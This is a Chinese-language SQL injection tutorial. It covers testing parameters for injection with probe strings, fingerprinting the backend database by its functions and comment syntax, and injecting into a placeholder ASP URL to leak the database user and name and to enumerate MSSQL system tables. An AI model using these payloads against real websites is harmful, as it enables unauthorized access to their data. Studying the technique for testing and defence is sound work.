Sql注入

首先第一步检查是否与注入,你懂的

判断网站是否有注入
and 1=1
and 1=2
.0
.1
/
/1
-0

数据库类型判断:

在sql注入之前,先要知道web后面是个啥数据库,这样才能对症下药,更容易实现sql注入
判断数据库类型,主要通过各数据库特有的函数,字符串处理,注释等来排除,猜测数据库的类型

常见数据库

Oracle、MySQL、SQL Server、Access、MSsql、Postgresql，mongodb等

前端与数据库类型

asp:sql server
.net :sql server
php:postgresql,mysql
java:oracle,mysql

常用的web和数据库构造

1，Asp+access或sql server
2，PHP+Mysql

各数据库标志性信息：

sql server：select@@version --
Oracle :select banner from v$version
mysql：select @@version，version() -- length(user)>0正常
postgresql:select version() --

各数据库特有的函数：

sql server: @@pack_received @@rowcount
mysql:connection_id() last_insert_id() row_count()
orcale:bitand(1,1)
postgresql: select extract(dow from now())

对于字符串处理方式：

sql server ：select 'a'+'b'='ab' --
mysql:select 'a'+'b'='a''b' ,select 'ab'=concat('a','b')
oracle:select 'a'+'b'='a'||'b' ,select 'ab'=concat('a','b')
postgresql :select 'a'+'b'='a'||'b' ,select 'ab'=concat('a','b')

特殊符号，注释的判断

  按顺序来
1，“/* */”是MySQL中的注释符，返回错误说明该注入点不是##MySQL，另外也支持’–’
2，“–”是Oracle和MSSQL支持的注释符，如果正常，说明可能就是这俩了,
3，“;”是子句查询标识符，在Oracle中不支持多行查询，返回错误，很可能是Oracle数据库。
这样一串下来，基本就知道了数据库类型了

分析数据库服务器类型

一般来说，ACCESS与SQL－SERVER是最常用的数据库服务器，尽管它们都支持T－SQL标准，但还有不同之处，而且不同的数据库有不同的攻击方法，必须要区别对待。

⒈利用数据库服务器的系统变量进行区分

SQL－SERVER有user,db_name()等系统变量，利用这些系统值不仅可以判断SQL-SERVER，而且还可以得到大量有用信息。如：

① HTTP://xxx.xxx.xxx/abc.asp?p=YY and user>0 不仅可以判断是否是SQL-SERVER，而还可以得到当前连接到数据库的用户名

②HTTP://xxx.xxx.xxx/abc.asp?p=YY&n ... db_name()>0 不仅可以判断是否是SQL-SERVER，而还可以得到当前正在使用的数据库名；

⒉利用系统表

ACCESS的系统表是msysobjects，且在WEB环境下没有访问权限，而SQL-SERVER的系统表是sysobjects，在WEB环境下有访问权限。对于以下两条语句：

①HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select count(*) from sysobjects)>0

②HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select count(*) from msysobjects)>0

若数据库是SQL-SERVE，则第一条，abc.asp一定运行正常，第二条则异常；若是ACCESS则两条都会异常。

⒊MSSQL三个关键系统表

sysdatabases系统表：Microsoft SQL Server 上的每个数据库在表中占一行。最初安装 SQL Server 时，sysdatabases 包含 master、model、msdb、mssqlweb 和 tempdb 数据库的项。该表只存储在 master 数据库中。这个表保存在master数据库中，这个表中保存的是什么信息呢？这个非常重要。他是保存了所有的库名，以及库的ID和一些相关信息。

这里我把对于我们有用的字段名称和相关说明给大家列出来。name //表示库的名字。

dbid //表示库的ID，dbid
从1到5是系统的。分别是：master、model、msdb、mssqlweb、tempdb 这五个库。用select * from master.dbo.sysdatabases 就可以查询出所有的库名。

Sysobjects：SQL-SERVER的每个数据库内都有此系统表，它存放该数据库内创建的所有对象，如约束、默认值、日志、规则、存储过程等，每个对象在表中占一行。

syscolumns：每个表和视图中的每列在表中占一行，存储过程中的每个参数在表中也占一行。该表位于每个数据库中。主要字段有：

name ，id， colid ：分别是字段名称，表ID号，字段ID号，其中的 ID 是刚上我们用sysobjects得到的表的ID号。

用： select * from ChouYFD.dbo.syscolumns where id=123456789 得到ChouYFD这个库中，表的ID是123456789中的所有字段列表